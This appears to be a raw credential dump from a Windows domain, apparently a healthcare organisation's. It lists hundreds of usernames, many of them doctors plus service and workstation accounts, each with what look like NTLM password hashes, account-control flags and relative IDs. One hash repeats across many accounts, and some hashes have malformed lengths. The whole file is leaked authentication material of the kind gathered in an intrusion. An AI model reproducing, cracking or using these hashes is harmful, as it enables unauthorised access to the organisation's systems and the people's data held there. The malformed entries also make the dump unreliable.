71b43a8306d1bb60e84a0bc2400a5a21 512 1868 ceverding 7bdf56b0c8cc9bb83518f19e7a68448e 512 1669 clnelssu 1106714dfdf3328364bd1dff5b8c6fb3 512 1228 drsanderson 5c385f430d1f6f29116929882f3ac87c 66048 1418 vogt 027327890c652b43c998a5f79f63e6f9 512 1458 aolson ab6a501de2b1f760f4de0134e97b42aa 512 1883 afaulck 71b43a8306d1bb60e84a0bc2400a5a21 512 1438 billcarr 2d786d35aa24f295a4c16cc376823c20 512 1163 bklarscc 5a40ed8b78cf6ffd60359431b0bf16a0 512 1273 cahayden a0ceddbb1aa337c1af6b4d94e28ba584 66048 1327 
kimgullickson a26a70472ac72321c39702424876eb9 512 1417 tommklsn fe09f58bc0b02f235ef16607f930a733 512 1457 msimon ca94efa04ff9cd46bce17ab37c7921a3 512 1853 bfischer 84bd2e8898162d7ab24b6de777affcb9 512 1850 ehaanen fb3a22f143f41255b89bd38c7ba07b86 512 1462 akconklin 89268eb0de4473918033f6b1fc68411f 66080 1261 connieschmidt 65821c4bc2d72044ce0d3f0fa2501916 512 1890 hoekljst 2a1bcb1c0b084375aeb67da26184e521 66080 1891 stantdst 5e169f4be14574721b835902689f9d50 66080 1375 drweems fc45ba277cbf3ce7a388e7100d0b7305 512 1373 grouw e7293202fd61f34b61a0b4baa02fe6fd 66080 1742 mjbjerbi 82bb2b0b540987253accfb71d1f62692 512 1455 tbachmeier 983ff0e9ad101c900da0c5bc733d5e75 512 1856 drbeehler acb98fd0478427cd18949050c5e87b47 512 1456 ljohannes a0003484e0d07e930556770c165cec6c 512 1404 eghaglind aea6119a95655f1cd8521a7a0a4b7fe0 512 1776 jdjensen 59e4e057226b31a183e383abaea7c6d8 512 1468 marshallklein beacd80369761138f6bb0aab8fc6210e 512 1474 drhamilton 71b43a8306d1bb60e84a0bc2400a5a21 512 1881 drhossain dba25b00fc0118977cef8471aa9c82d3 512 1211 drhendel f1d8e19769e696ca0b78eaab38e2255d 512 1395 drschroeder d9d8d32b8137cebc5e457103422ccea6 512 1469 angelbarnett 727112bca3218bd419fe1cce82de62a4 512 1900 cborneman c88ea1a1c1e7d82b29fe4377d18bcd5 512 1479 pehaberer 596b4baf59fca2aa4ed4f573be026fa2 512 1452 ebeauchamp 0502e7a5bcc435cb35693cf38a4fee8f 512 1478 slschutt b7e6fe1aa6d609cb1fa8aac5dcdf3acc 512 1897 orourke67 bc6e72869afdc91a67bc43e10f7094dd 66080 1908 mhockett 930780c4c40cde7420cd6d4a305ee5dc 512 1185 lmmillsu 8ed2c1b2953497e077f462f7ab4084e6 512 1251 krouw e7293202fd61f34b61a0b4baa02fe6fd 66048 1769 jmcarrsu 13509376bb407cc458585951708f27d3 512 1750 wkandebi 7bdc68efb1f39079aadd98b0304e2c27 512 1914 danelson edb0f053f8d7bd5295585d63f208f4ef 512 1351 angelabradsteen b0d18851aaddc665883a0c2fc3eb1f95 512 1486 draphrem 71b43a8306d1bb60e84a0bc2400a5a21 512 1861 cmitzel 70a75fc03a0a6727463de3fe2b3c56ff 512 1918 drsiruno 71b43a8306d1bb60e84a0bc2400a5a21 512 1304 pattell 
36c71052cc9f3df09b42f66f537ce603 66048 1485 kolsen 05acb3279db9544eba15593253698ed2 512 1792 gkaplan 8d1a7f3e785301eb112b1c789f56c3a7 512 1924 smcgaughey 71b43a8306d1bb60e84a0bc2400a5a21 512 1800 bmremund 30d9347d957dffe3c1aa15ab36f6eb12 512 1164 s_martcc e98664c8af176f206d9c9a34b98b1e6c 512 1488 sbuhr 1ca6d0d3c253161bb3e45ddb1219709b 512 1913 ksherbert cfa9e1825e538868e223ce860b2c0909 512 1492 lafladeland d3f8d051fee5fab0dcfda3645ad326b7 512 1892 mwalker 93bd4c9e8882bea66b1fce8c8f58e10b 512 1460 btrontvet 95a607aba41d7dc1f32ffdbc5c122191 512 1684 g_krophs c19bb385844e62aeb63d1cab15ce2bf0 512 1442 jljerger 71b43a8306d1bb60e84a0bc2400a5a21 512 1493 cdsilas 2d2d675a0940926815c12c5c76cd5643 66080 1664 maswenor 3ae2748c03bf865aca895ee900e382c8 512 1496 dncreager 9e0f6c8bd02484863153490417381184 512 1915 kanelson 35dab29d6dae351fff051348c4bce1ed 512 1436 ktrue 058405257249b0c11ec365f8a6370982 512 1499 ahqarni 31963a3237190431525995eac7c19763 66080 1871 drjaiyebo f8f0483906c24c4068df7a3589d10da9 512 1933 gwong 628f45205d05822f848f8ea4683035f1 66080 1802 drmckee 7a8918a1fba8966061eff9738cb49e03 512 1903 ajboock 12daecf4f46efdcd3d1dcb66be685211 66080 1501 kjschonhardt 9e0b975a698164cc445b6590b478d9a8 66080 1113 colorcal ff5bde13f83d41f71ad00d7746bc74c3 66048 1132 calcxtra f8d047478c9fbb7c5fd6172f7e7148c4 66048 1503 bas 048d01202d68f356e0f7c22e12f45179 512 1337 tjhein 71b43a8306d1bb60e84a0bc2400a5a21 512 1157 a_attecc a5c622cd84f1af87c6bc9e34f348e553 512 1902 bjwalker 44745e179dc7e96cf050eca9012c6c80 66080 1819 jhmathew 71b43a8306d1bb60e84a0bc2400a5a21 512 1904 babatunde 71b43a8306d1bb60e84a0bc2400a5a21 66080 1398 juakbar ac4358090ce0ec69de96941b9159effe 512 1940 alexwong001 71b43a8306d1bb60e84a0bc2400a5a21 512 1930 afclark abaa74ccce04f1aef62f0034b526d76d 512 1405 eghide b7297b0c9a30de3c0cdc87b5d3f688a7 512 1504 roxanneh 1ecba2e0469152720045def76416c8e6 66080 1495 rachelvoll a3397279e951697a4d9746231c9baf97 512 1937 lklevberg 6af5c89fabf8460a0281e7045c05d95c 512 1944 
abeachy 9eb9ce5359d0d219636287eea5715766 66080 1369 drjibben d2bb7bae3a812554e6560a80bf8c0d7d 512 1783 drwhitley 6df025ce8b176733799affc44a20a202 512 1743 pkelleob 6b0b3bccf6939dabfd45089122d67bc6 512 1916 ahasling 346e634f32780e32afc8e0af7b50b882 512 1512 ftlasala 089baa6e44b9f73e9dc07a440c531c96 512 1177 djmoensu 6cfc0d4e4a46bc30cd9ab35d709058af 512 1931 mjansen c5e7e74db335524b2231d823efbeeef2 512 1949 tdebrito 71b43a8306d1bb60e84a0bc2400a5a21 512 1950 fkarsnia 71b43a8306d1bb60e84a0bc2400a5a21 512 1951 dwinans 71b43a8306d1bb60e84a0bc2400a5a21 512 1958 emedini 9674fbff3cfaaf66f4d997c889a8441a9 66080 1948 jzosel 71b43a8306d1bb60e84a0bc2400a5a21 512 1941 jsmoza 333dacdf4114b5c91dac43802a36fac9 66080 1198 gnthorp d147b5251d854e35c0f453690eb6f92c 512 1960 maakinyemi fab06fb7e4efb6a185c40f5e84eeccbc 66080 1963 mnhasnain f0f75ba30b39a4f952d09c0887e9f08a 66080 1938 bwaite 2f3d525c6bd8e700a68f44ba6460eb4e 512 1947 jstageberg a686c0c3a2580fcd62c1f5c311293ad4 66080 1516 anmorimoto 984b3943b1222418e0b227338c1702e3 512 1662 kkschabi 8fc0da975463b786cb63a655b7c7ba16 512 1517 ctmn00 9e9b58c2ac713d2ff083ae568bf40d6c 66080 1968 dsstclair 55dc4b979fed2985f9180d1ba427c817 66080 1489 parkin e1266a7e4dcf5e7064c76047a561c7e0 512 1368 drbrown a490b356a1f039bc5d02b07a51eb7caa 512 1971 jak c59508253f1ba8a772ea7b39cabcf7dd 66080 1972 jmehlert 777a4677299f8631c379d2ac18ce4830 66080 1974 hjschwartz aa2ec5b61be663b1ba420069b8b7d644 66080 1976 sllang 5821f9c48a246bac75e67390c51d7221 66080 1121 NWKS1$ cdac73fa5c46121e947253723c207d180 4096 1122 NWKS2$ 380dc1a1758e385f05b1757caf83e053 4096 1970 hottenbacher e957cf961db72e8b18461f42b32b8307 512 1120 NWKS0$ 7548ee60d9258efe0b68c20326289b4c 4096 1208 dreisinger 26c5286aad4cc5a67d6c1b498ba66878 512 1339 kaanderson 4b1dd37505ef1dae700f315e3971c75a 512 1298 marylouolson 22958710c569d1fa791f43aba4d4e9ea 512 1977 slmcfarren c42527f7be2aff1c302f881d8174a910 66080 1982 drdussault 71b43a8306d1bb60e84a0bc2400a5a21 512 1526 tmnyarandi 
71b43a8306d1bb60e84a0bc2400a5a21 512 1525 grweischedel 4438bcb26b836b0339de5a6f2e66ffd0 66080 1981 oomokhodion 34edf9d3e7c66c79ccbc6225730a81d0 66080 1665 k_jordor f6212a5ae87201fe42f9d891d322cab9 512 1451 mjbutcher fcfcec23f19252d7417693e9819d8a37 512 1528 jjrigby 6ace8f289143d7bb6e5f12aadf93676c 66080 1482 lvogt 8626c1417d2543e499a70055697de1cc 512 1899 bhuotari 91f0894b363984686d7f3f32a681fe07 512 1487 bhydukovich 440921ebded7e97a4b91624abfa12058 512 1531 lavierra 315518d92657659650692e8423d3bdb5 66080 1763 d_debror 4ba24a6ef06cc00b505db9948ff695e4 512 1522 remartin 5a754961d0cd7e31f078484ff86d673b 512 1509 awells a4043550c328b3ba9832e6f755fabd24 66080 1533 dsunstrom ef270a89b56d96ef597a8c29f306b2b9 512 1481 jnistler 602a005eddfd365e04e4db27038f6c25 66048 1537 tdozak 02a7690cbb5ba35f67703ff8ff0251be 66080 1896 fmitzel 0a987196697088eefbbd958fc5bef859 512 1480 ahopkins a54ed711f34b55cded8fb5b64ead0b4d 512 1920 tjlind 73cd1d8f36c225301f1395a68644e91b 66080 1747 mlwicker 75b21858169704679e44b7de9485381e 512 1311 susanwoessner 11e81c29d73b8b739d48574bf0aca075 512 1994 smzak b7cfd41fe075a15963664b2459faa455 66080 1993 jmjohnson 530a7f8e06360c77afb7b16cfeca5584 66080 1992 ahaseeb 221ddc7e89d6ef0a69bbfa241379808a 66080 1991 amguyot 0fffd31fca8b05a4beaab0efc2bdbb42 66080 1990 jmgrudem f477b0398e548a8b526eee322df6c6fd 66080 1989 bjdavis 750c52d81089f4d5d662e82425fa7890 66080 1988 saung 5567e9bf2f46d7951f2a9660c0b48a77 66080 1956 toberg 74dc5c8262a0a22130c6aee81dca267d 512 1463 mebruininga 12050de9174a28b116fd22989bde2b10 512 1969 seharte 73a5ab74fb4af9b2562c7e0ccaf24e04 66080 1962 evavo012 c7105347e9a12d44934ed8f1b86a963c 512 1688 basillerud 85d9373449b9dd9457b3ba5bad1e18b8 512 1995 rpmontenegro 91214c29730b425f9254efdcb2e98894 66080 1996 jmmayland 66b3bfc3e9ccf7bfa5908978985b1a8b 66080 1998 skramsted 54dba8a6ef6f4180785f97a926fdb929 66080 1999 tjmohs 8e1140495086fcd954b5dfa1682d8853 512 1540 drfreeman 38c7a4d796a3bc428467097c66a7824e 512 1490 ncarlson 
13d20ae7b8d1edd2a5cc2a4850dec98f 512 1954 relder 23eb25e4307a4c774c553792b29f8b 512 1518 dstclair c405a94abdb3e08736a8250e609691b5 66080 1542 djharms 4646a25232b9877c8b4cede7a79054bd 66080 1411 drellison c3b00a190a99d9f3b4e415d11491a9a2 66048 1543 pswasemiller 69246f6d972a33a4d250819f1c4c4862 66080 1547 ajstasko f3973a2a5b3cc520f11d6d5377c90887 66080 1539 adweichelt 33c88da77d69a77464c22a01fd52cd23 512 1671 k_demmed 31e8cefef1084db5c465273ea21e2b89 512 1498 jlbaldwin 8afae19cb75a9938e93e0d64185cb1c1 66080 1497 jpull 2003a86bc4317ae69c3a94df2e34271b 512 1532 arpicker 1bde10801d22449dcffb76188c626bb6 512 1473 drehler be64f8fc4124dd98cde17a19cb48acce 512 2003 tthuyn 74f754c71bc591379ba8d9e2450ae76c 512 1467 ratinsay 8a6d1d02b5f1ae79d48adc0df621f699 66080 1309 smrodriguez afde914ef03a7f99c1e400d70451a5c2 66048 2005 jrglyn 5d75661d8a53ce0417d1b6749673b16c 66080 1877 kpederson 051e63a2e0111187dfc88bc27a3bebde 512 1272 connielokhorst 431b4387576ef6314152a56f3e9e89c9 512 1736 jlindgren 0b048129c6801a30012c877dfa365985 512 1927 hrabbasi 522dc460c454db1afb366ea21bb28249 66080 1557 brhils 9c8ef96d93ff6e98dafd1dda813f015f 66080 1558 gzike 71b43a8306d1bb60e84a0bc2400a5a21 512 1711 njrundmu 3962a1c5095221bd197b54359b1eea4f 512 1561 snkent 8e4f2b090e863e4a4ab746266f395f97 66080 1562 nikreit 61bf357d002e67b6a4368816b3070056 66080 1788 dreelkema 71b43a8306d1bb60e84a0bc2400a5a21 66048 1563 mvseverson e8b5663e5c7d55253644c62d078a01e9 66080 1194 ejmoir 5add8cc48ec47eb612ed4c225935726b 512 1556 smturner 493e7347661f5df50e12d38cf45a7a11 66080 1566 bbbarnstuble 9077ca9df2f813557f61436eddbd1617 66080 1983 cdlureen 36192c3f8a11b1cc743d45d30c12b039 66080 1303 phokanson 71b43a8306d1bb60e84a0bc2400a5a21 512 1397 ijchitu d53fa7b4a7afa23d6959e9a162f594bd 512 1421 drknutson 71b43a8306d1bb60e84a0bc2400a5a21 512 2014 sbatra 40fc2f1989e9062550bf0aed5c737947 66080 1640 cml 1bc33e42cb19a792844b7fb6dd04fe9d 512 1310 susanschlueter f3e6b2997d0aa15c50e8dd0ee057882 512 1470 charlie44 
53da6be61082ec74b099dceeb80cd75c 512 1898 lroehl ed0b817db13e1848e1b4b5881ba27e05 512 1564 seknutson e768dfefaf663c7662405337f32557df 512 2012 mcbressler 15701ec0d0df81b920df1285e038926a 66080 2019 abjolley 72551678e0cb74c8157833428afbfd87 66080 2022 inansine c989196e3f82c855bf256c926344231b 66080 1170 emlodicc e25144ddc66a1e65d6025c687a363c80 512 1570 grhyland f7f2f14d1571ad848b5caae0afe576aa 512 1986 alako 97097d2962cb4b3dd0e0ce12aff3ad 66048 1952 adool 2ddf823d166e7d8769a76a9b9963e980 512 2006 bboom 56ff6b4a94bb106bc53ed861131a084f 66048 1953 pappelget c1287233b1dae2ae1cfb93f65003358d 512 1356 beckyhensch 6e5e3967d92ddbde06e26298c0648194 512 1679 osmotkfp 50c877f12bb3ab3a1ae0c90967f4e97 512 1836 staceyswiontek ddd1940715650b21ad48c5ba67adcc38 512 1987 akuhn fc88bee9b0c17ca524adb09ecc8b805d 66080 1955 awohlenhau a75fae5b4c80180977b062a2b01f1187 512 1534 baagard 0290400c405abaf5a5f6c862ce7ba8ee 512 1124 NWKS4$ 002d632e95effc6793cba7fe5dc65093 4096 1578 kklabo 715b5362db34d6acd654e0a1763483f9 66080 1577 klringdahl bf8e69157a193c800a66b83c8a9df864 66080 1364 NWKS11$ c0ecff2a6454d92cd29619414c879ffc 4096 1362 NWKS9$ 7c148e919425e07f48df098d481d91eb 4096 1123 NWKS3$ 7ebe7393bbd374e6161fcae2129aa660 4096 1130 NWKS10$ f245c27b080ceef5f43f5202aa80e5de 4096 1382 NWKS12$ 366eaea8e999f9b72c7d40ee8819ed2a 4096 1128 NWKS8$ c8d0b8661825257099bbea223526b4a7fa 4096 1156 t2 00e05128adfc76f8abd66588f9a5acf7 512 1111 backup 6817c701afdb1af1fba708761c2fc56d 66048 1154 test3 5af3584b3dc373f54f88c04f9bafc4a3 66082 1133 demo a80fdb8db842a99d87ef3d857f8ddcf1 514 1429 trthormodson 55a87b3f01b7be6d6fdd2e8adfd5f7dd 512 1127 NWKS7$ 25051c3d18bb3cd72a2eac82e43ce515 4096 1126 NWKS6$ 540b1aea40c7862d081dfdd9191dab69 4096 1125 NWKS5$ 02552a5f4bc62a86aef7991040415156 4096 1242 drkim 4a89fabed90f8bdaad4c3b5f9849d0da 66048 1116 NSTORE0$ 2fee332c247d4950ee9a515b30cf1332 4096 3605 dummy d1856f76c1ad69d2f9fd1cb4d184cadb 66080 1285 juliedevries 3286bbe80dd8a5adb29271452d3a25 512 1727 j_herzrc 
71b43a8306d1bb60e84a0bc2400a5a21 512 1529 dmarsolek 0d9abd5da9c1866c5bd831210a492743 512 1114 NODE1$ edae82eb008b0370092cf194246b2208 4096 1115 NODE0$ 0b0c7cac3d4a70b8a757bc22671deb8a 4096 1271 cfvorland e8254befc20061f88fa9f42a41e0c8dd 66048 1604 NSERV3$ 1b98c8261bc0b0e672d00be49f42848b 4096 1546 oaajayi 17ff2378c1e12cbfe599b888c1150ff7 66080 1775 machelleellingson e4f089a7c304f1dc1b780153ecd3f364 512 1483 gschwartz 9ce58ad20c46478fce080e997bb33d94 512 2021 nlnordwick ee4ea2f8de1cf636ccb2be6dad783ddc 66080 1544 smitzen e51624612bf604843c28b87c28d92cd1 66080 1305 sarahthormodson a39cda5325b0e788aa11340313ea0345 512 1443 crcolosky edebf24db8fd09f1a0f968a391cef2fc 66080 1812 ptmgr 760914937703f202577c78f561733b31 512 1975 kakragness 56e541a171ba2657f59d037c1eca01a0 66080 1973 loriv 4c3f522e7795bf6057839202b9217aab 66080 1939 sbt ce19b3c08eefb3c70f7ff8d635bca0ee 66080 1816 raisnf ef41696712216e5d6b18f34591f7e3ed 512 1967 drsullivan 28a07a24ca69c3096c371f83ed2fd6bb 514 3611 jmvodvarka 0988517aa5c0d23287f5531bd767bdd3 66080 3612 rdleach 305748acc942ce51ea160ffbda2559ea 66080 2017 jharren 73e28a16319bce0a219a862c9f204430 512 1500 skchristenson 54b9fc57d368b8ff2a7101acbbbe44fa 66080 1131 NSERV2$ d761fd6b7f26488f9698d91b7eaf1e1e 4096 1919 dlsellgren b6a7b4ccc18e78e895fdbc2a347d6798 66080 2015 ionyeka af4f10cee095a721eb8cb3f036df1c70 66048 1738 drwinans 71b43a8306d1bb60e84a0bc2400a5a21 512 1554 jmayer 787289804393737481268248227c117827 66048 1722 trheeter 0b05de3837e6ba3ce07be5fce98c6322 512 3107 almoe a87b3d76707861af97c27a27187819dc 544 1538 daseiple 4e74436540e598306b5b2ba9c16e9620 512 1513 mlwallsu 160a1427d98056bf150dfaf2fe48777a 512 1667 jagreesu e7cb8d48488e91ea0dd4548f574d6659 512 1761 jagreen eeda0eb9b71e405585858da0d7642ab781 512 2046 rmjohnson 289c0c451964e336712485cf8dbe4755 66080 1545 tmsevernak dcf92958c0599f683d18a8701d6efbd9 66080 2037 bellerbusch 1ce00366e6098db49075cab81822db56 66080 2008 fkness 5f43280579e5f5062ffb466c323b79cf 66080 1454 eaberge 
a25c8562b46b3d0c1533faac1dcde5ef 512 2050 nnwelle ab8daa583f3d0b371e69a77e6f572bce 66080 1459 bmharrington 854433a874acdb34b89038360951ce 512 3613 mmmorrissette ad7735963a7ca199196f8dc3a0cad73d 544 1882 jdmeyer 6c2f21eaeeffc12bac28d943d81901f6 512 1284 joanneness 0c49e463779481ef48b1f1feb997bf1813 512 3608 bhebel 2bdcad6d2082323222a291328ab4883e 544 2053 sselander 729e9ece532d9019bd9038ce881261d4 544 1291 lorikress 189991f5fe87e3a5a7e9e48d02d02ed8 512 1253 jlgaddie 347d96e999a64676c9867077c3def848 512 3111 sevans bccc9db3f8487cf2d7a5841b947e5352 544 1203 drasp 1281fdd45fab83c83c14909815968d7fde3 512 1734 bjneulrc d7a898205589c97a081ecfe4e1d03dac 512 1197 lbdrewsu 95c852590a06992b56dc18c19d8f7ff2 512 3619 amschuler 66c2ea682add1cedad28a54d2abe1e29 66080 1270 cherylbarry a9936d9ada4e566970ffab18ad878360 512 1381 pstoy 4f0a88bd21612aab75bbaa60de5a0ed3 512 1348 annvipond aa6a9b32f4966bd433a43775da85a4ef 512 2025 ajberger 8589f311be9a89f3f5cb9f25b7331786 66080 1264 amysund e81b0a2dd62794e47449df0069578e0a 512 2054 ahovet 71b43a8306d1bb60e84a0bc2400a5a21 544 1749 bramunds 08f433ddf0fc1ca21774d06679edf8bb 512 3609 mmorseorse 92ea6607ee7c2e6d531767525ab897d4 544 1672 mjdethed 39ea5315b341f934298362c6d4a91c66 512 1762 d_buskor 3bc79616b3e5f0ff07e9cb3b1c15c681 512 1535 nreger a9c4f9d0547a927b2a3218803c8d7294 514 2013 speterson318 753e158458814722e2a683c683d5c8e97 66080 3117 snhoeper 0ad907fdfa4b6b97feb2958184664c5c 66080 1751 kageormu d1394916f03c58c542c1bd959d4f887b 512 1879 drhone 47e51872dc078c8816c4444e09cdc47c 514 3120 lamartinez f8661751b21896715d42b388a201e403 66080 2056 klvaughn 270ad290a806a2a58bb980f8fcaf6f72 66080 1555 jturk 07dcecd4742430e0327a34353df4e5fb 512 3113 hmckay 35e649e3253284b7cfdb7797ae18bc73 544 1932 ecokundaye 5cd2316d2043cbbe21c042ccb0062669 512 1560 mvagts f3b3687841a863b9756718138a65e0f9 66048 1559 jtovson f2d2c21e5cc948ad54cdc241cae398ab 512 2011 skhan 3c850a53e8f962d6d2db12ddafe2b38d 66080 3623 habjerke 7e8c84c917c9fc038963a3ce93216e85 66080 
3624 nmburrows 53e1a7c692df47380ac6b10fa929d619 66080 3116 lbade a42517c0b074323ed7551e7843e06a6a 66080 3622 rasamaraweera 53598c7cef57dbbe022cd6c3a060dd62 66080 3618 cknapp 8d44d9d97a7eb51453c9675c27f77d58 66080 2057 amueller 1715ffc1cc289374eac3d026d2212729 544 2055 kherness ee1357a73b9570c7417e92a6c42108b2 66080 1865 jsanders 7bbe92186dfa6d83ff80f86ea5432bae 512 1854 drbrett e61249c7e0f735af6455250d047454be 66048 1765 drgallagher 39a6ccd7d6d2babdd11650ca3e4f2e7f 512 3125 sreilly 23ae101070bc0586361647a114e924f4 544 2020 teevenson 21cd92559f2f6777c392238631bfa2da 66080 3626 svaishvav 55d497470255d27142997ea1a14440 66080 3627 cwwieland ae28fff64a4fe592611d190f19102983 66080 3625 lweyer e3e7eee1ed76769a23f471ac120c1e06 544 3124 nakunz 9dbc36a0c8329bd74432d16fc2c6bb6e 66080 3129 kbbitz 97e8e354617e6ee997afc476e63414a8 66080 3127 djepson b678ccaaaf35cbc0abfca452ad58a228 544 3131 bjvermeer 4c62227a61ee486a68c7a9669dde29c0 66080 1921 emseverson 4f44dedf2fde9618daac909e19bf86e0 66080 1349 gpnordahl 2fd4028cbf019e74c73561a8b38842a9 66048 1657 jlhoxibi 0d83157bb7516b53caefc4ddb26cb3a8 512 1837 jattarian c351b623e6b9a8644df6e0306668be3a 66048 1226 drpettit abc9339628f25497f82bff321aef2adf 512 1424 drlazzara 621cbce749b9e2d0d3932c569570af16 66048 1354 mhstrosu f101a562f2474a7ebf2c882996f78dfe 512 1414 mmalterud 252f40027953f53db8d5355fc4e623f3 512 3134 drsmith f53cbf927e94b3299e739c5bd5a68a82 66080 1383 drgundersen 6507e1a9ce1074d7033ace38472930d6 512 1431 rakhan a071fbf41deb4a041253d28e8349e11a 512 1255 mjblank 3a9be57e8803c1d632a52665e8886922 66048 2063 Dmsoderberg 1e27ea1d77323210ba372ef48bc2435b16 66080 1371 lindaanderson 99bc030173d93dd089f0fb00f663a592 512 1936 kdkaste 979cf8e3376ea416e5e9e247441f145b 512 2007 emurunga 68859a1fae623d63c1afb7f4722ef25e 66080 1367 drmcdonald f0e5ca8c0726e882a6d08ee2fecf6010 512 1494 bimanoel 53ced4ca69f53350ac0a242037b42d3c 512 2062 mlmcclure c724392f7594a12f52a3e2ae3f09ed93 66080 2059 sotto 556c52008436c466b802843877ce5b77 544 1895 
lwatkins 335c8f6f374ddbb6942e65e09dbfba17 512 1464 stesfamariam c8ba09ade5d018958a24e66aab7eb381 512 3615 sdhansen 3be1b8bc507e147aec8fa1c8c3255ad1 66080 3133 ebibich b418813395857c8dd626946ca72aa6d 544 2060 cschroeder 848c5db736f59224b6521f83de457008 544 1316 njohnson 71b43a8306d1bb60e84a0bc2400a5a21 512 3126 krwannemacher 02ef3299dba8d6b10273d2ec377c451e 66080 2051 lemolter dc9515868900774b69ae6764f74b03d7 66080 3130 mfradet bfec4f416bd9c687473afb442cc89786 544 2066 amusolino 564591a18751d61a058a8e12a9ea2b3b 66080 3140 agqazi 37c1acdf538c07ebbebadb2e013b65e1 66080 1254 jyrkwa c49ad9b094c1e2e9070a48b48b50c40bbca 512 2058 mehouge 21ed21c51ceb7b847881ee01b0f2f0b2 66080 1390 jlnuss d7d4080754aa8e52b97190de07090957 512 3630 hrose 1a7205abe0fafad537d6981673923a5d 544 3128 bgeorge e6cacfc8e3db00201d49bb163118f601 544 3139 cjfisher ede2b6f6f961d6a7a14181af90e0391e 544 2073 blsolheim 5d20da4120415a68bc3ffbe1f00551f4 66080 3632 barettig d6a8135ba862cf03dd064ecb505e1c98 66080 3115 sadahlen d79359164379bec437474a4d9d8944a0 66080 2074 drpauley 112602cfb846fe1795c14c68909dc678 66080 1166 pmpetecc 46e0ad709c50659fc59b550ed7f232f4 512 1365 mdmartineau f8ae494e75ede253bcc67de16fa28e03 514 3142 llcodner 50c1106bc8acb197a255aac5e721709c 66080 1541 qualcoord 0354dbb8b376dd32094b1aefd044d37a 512 3108 ztariq 4705d690f3cec55eaf97c339a69e71ad 544 1173 mjweinri 010f4c58fb04b3ef9b0dd6fbeaa9d33d 512 1682 ljoelkmu 3310515e0a269685d1f2c706cb1a84b8 512 2071 mchris c549a587fc362d601d0a52492a4f9ad3 66080 3148 kljohnson 54f315b20794c3d5f3eb65cef37dd955 66080 3150 kjwalters 0bb84c1adf6c83e25de00741092c319d 66080 3151 nsfroslie 7b759a3f19d6ffe661a629155aec8266 66080 3153 rdcampbell 9ddd27701fca52a3ec319fb2a5c34466 66080 2076 aregan c33f96e046365baab7d0a02204d42cbe 544 1491 slmcgaughey 200a4de5f8bd14c46d65bc8ad1c6ca06 66080 3106 pacs 8846f7eaee8fb117ad06bdd830b7586c 66080 1514 lbdraxten 4d91441f69a87232486af44a6b08f253 512 3633 knelson 03d0143159401abee5a528c0dce74768 544 2080 Cayarke 
a0316a9f9330960ddad527b32f5af0f4 66080 3638 ljniesche a0abcb477aa06118d0ebe413532cec34 66080 3639 tmwatterson 76aa8428553737150243c4c963d569fd19 66080 3637 jmotto 3a3c6bebeeec017dc900caeb7ccbfecdb 66080 2077 svaishnav 55d497470255d2714299777ea1a14440 66080 1293 madillon 1ff36f57aff1d5db8800d2c785a0cae0 66048 1764 vrdillsu fac2ef7f50e774a2e41df12dbc505099 512 3640 dkgrefe c7ed39affecbc90fd91a1abf68edda0b 66080 1686 tlanderson 55150fc03adda47232d11fa83533d995 512 1984 aleimkuhl cbcd954052a0dcd5384e34f3353a99e1 514 3641 jlheuerman 5281ff4763d8fb598c4266868eb8a7ad 66080 2088 cmmartel 5d1bc7b455964b6f5ae4317b6fb3b9f1 66080 3146 wdduphorn c3b2e61a8a7e9328a07c93457f636b0d 66080 1820 nronnrl 19ad78367f61ade03434329df699aafc 66048 1773 tammimark 9938969a3e61da4b7762cb0b28e52eaa 514 2090 lmmilbeck 51aa35e3c69e3af7a8cad0f55e11d8fb 66080 3159 tjstudor ecdc539913db29572a6db500a015789f 66080 1942 nmnelson e63625ad3dbb41c2de8e7f25b5a18d69 512 3155 mzarbok c8e58daf37662e53ad521414519da823 544 1358 hjanderson ba2f17c9a6927eebe340a25d57fc63a8 66048 2048 aghohman 9649dda66c04c694863b38c02a6e3d3f 66080 3158 kmeichten d20236d18fdb68f0bd26824a1d687fbe 66080 2081 jdavis d9c08ff5332e2c79e582e88637cb260b 544 3642 cgordon 51457260c1e3b9e4b265a9201cdfd713 544 1757 kkstensu 0076dcfb228b7cf51861624948f4a2a5 66048 1925 slmontella 339a9f43281e1d64712917d8b34ab34e 66080 3154 skeller 4857e8c54f2cc52b41f268533403988c 544 2092 sburke a3742094f040007d503a077f3b7b18a1 66080 3636 pbaronhabberstad 5b53a73bf553fcf9374db33be0cc7fa 544 3141 vandvik cc5077e4d91fc974fa62d8629e9fba7a 66080 1799 alnelson 7e003487c37a3874283424b645d18668 512 2079 knstorey 1027f9d7f556dab44d720831e603bcd9 66080 2095 plhed 23e1cf54a3a8db2a8669d4e12a0a8241 66080 2094 dlundby 6b2a35a602186a65973c02150fb70bc9 66080 3161 klillquist e910bee2cd95a3cfabe052189783b1d4 544 1702 wynnkjhs aaa952b4f92018f800e5c19aa9255a6f 512 1706 slleroy 3f7684d51be0a9a78cd7e7a36c7e297a 512 1666 j_beyesu b5ef8bc4d492c5e96fd3ac3d538502bf 512 2083 kbressler 
6177b8ccd78e74cd0e23f2121a0f95ca 66080 3156 rbeech b2c06077f1866a3ff2f0e30120d194a9 66080 3648 krubink fdf417ac259ab089e4fdb06269ff93ce 544 1277 djmoe d8a0a68924b7b8dad11e0940ee72a147 66048 1980 NWKS14$ ff080dfeb5a55503cd8129caeac080e4 4096 1521 NWKS13$ 8114caf690393938e8beead4db4c7bab96 4096 1420 aedraeger f23c5c919a07dd7cb86a9d9dab192ef9 512 3164 lmkeller b7ed01f474587ed397b553a566e0239b 66080 3165 drtest 787e222e7b428a71b895c3d39f1ca222 66080 3651 eripley 71b43a8306d1bb60e84a0bc2400a5a21 66080 3652 hsolo 71b43a8306d1bb60e840bc2400a5a21 66080 3653 jsparrow 71b43a8306d1bb60e840bc2400a5a21 66080 3654 erdoctor 7c53cfa5ea7d0f9b3b968aa0fb51a3f5 66080 2000 acbabb 64eaf056b0f7c0f0fc6951ce71e6d6c9 66080 1828 sjpeterson 16497f15560fd9fa371c158b47241b66 512 2068 rluong a82f44c197d723aaca24812e8c6625c1 544 2101 testpacs d44c1eeef473921cc43b079f4a3c1412 544 3168 sclaus 64eaf056b0f7c0f0fc6951ce71e6d6c9 66080 3169 bbee 7c53cfa5ea7d0f9b3b968aa0fb51a3f5 66080 1109 aliedit a80fdb8db842a99d87ef3d857f8ddcf1 66048 1159 iccumgr 544e16f0bedca7fe5b2edb739a0f3111 512 1505 erdoctor1 b14459797d622853569db78c33b43474 512 1241 drtdlarson 5202215389406b0eccb2f1f029c57e9c 514 3166 athelen 2df4f3ee1b4faea233b68268ae983329 544 1574 VMUPGRADE$ 86bc8ae462a55843fe67520b11523d58 4096 1553 brhills 53c6e7c8b0150f36b797ad32d62abc28 66080 